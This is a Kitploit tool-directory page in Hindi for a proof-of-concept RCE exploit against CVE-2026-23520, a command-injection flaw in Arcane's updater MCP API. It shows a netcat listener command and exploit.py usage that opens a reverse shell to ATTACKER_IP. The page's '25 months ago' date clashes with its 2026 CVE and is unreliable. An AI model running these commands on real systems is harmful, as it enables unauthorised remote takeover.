Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23520 — CVE-2026-23520 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Arcane की अपडेटर सेवा में एक कमांड इंजेक्शन भेद्यता है, जो क्राफ्टेड API अनुरोधों के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/cypher-21/cve-2026-23520
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubcypher-21/cve-2026-23520

CVE-2026-23520

CVE-2026-23520 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Arcane की अपडेटर सेवा में एक कमांड इंजेक्शन भेद्यता है, जो क्राफ्टेड API अनुरोधों के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23520

MCP API रिमोट कमांड निष्पादन (RCE) PoC


📌 अवलोकन

इस रिपॉजिटरी में एक रिमोट कमांड निष्पादन (RCE) भेद्यता के लिए एक Proof-of-Concept (PoC) एक्सप्लॉइट शामिल है, जो उन एप्लिकेशनों को प्रभावित करती है जो एक असुरक्षित MCP API एंडपॉइंट (आमतौर पर /api/mcp/connect) को उजागर करते हैं।

यह भेद्यता एक क्राफ्टेड API अनुरोध के माध्यम से सिस्टम-स्तरीय कमांड के निष्पादन की अनुमति देती है।


🚀 त्वरित प्रारंभ

1. एक लिसनर प्रारंभ करें

root@kitploit:~
nc -lvnp ATTACKER_PORT

2. एक्सप्लॉइट चलाएं

root@kitploit:~
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT

📥 उपयोग

root@kitploit:~
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]

🔑 आवश्यक तर्क

ArgumentDescription
targetलक्ष्य IP, डोमेन, या URL
--lhostहमलावर IP
--lportहमलावर पोर्ट

🔧 वैकल्पिक तर्क

FlagDescription
-p, --portलक्ष्य पोर्ट (डिफ़ॉल्ट: 443)
-s, --schemehttp या https (डिफ़ॉल्ट: https)
-e, --endpointAPI एंडपॉइंट पथ
-t, --timeoutअनुरोध टाइमआउट
-v, --verboseडीबग आउटपुट

🧪 उदाहरण

root@kitploit:~
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
root@kitploit:~
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444

🧠 नोट्स

  • टाइमआउट आवश्यक रूप से विफलता का संकेत नहीं देता है।
  • एक्सप्लॉइटेशन से पहले सुनिश्चित करें कि आपका लिसनर चल रहा है।
  • पेलोड मानता है कि /bin/bash उपलब्ध है।

⚠️ अस्वीकरण

केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए।


👨‍💻 लेखक

Parosh B

टूल डाउनलोड करें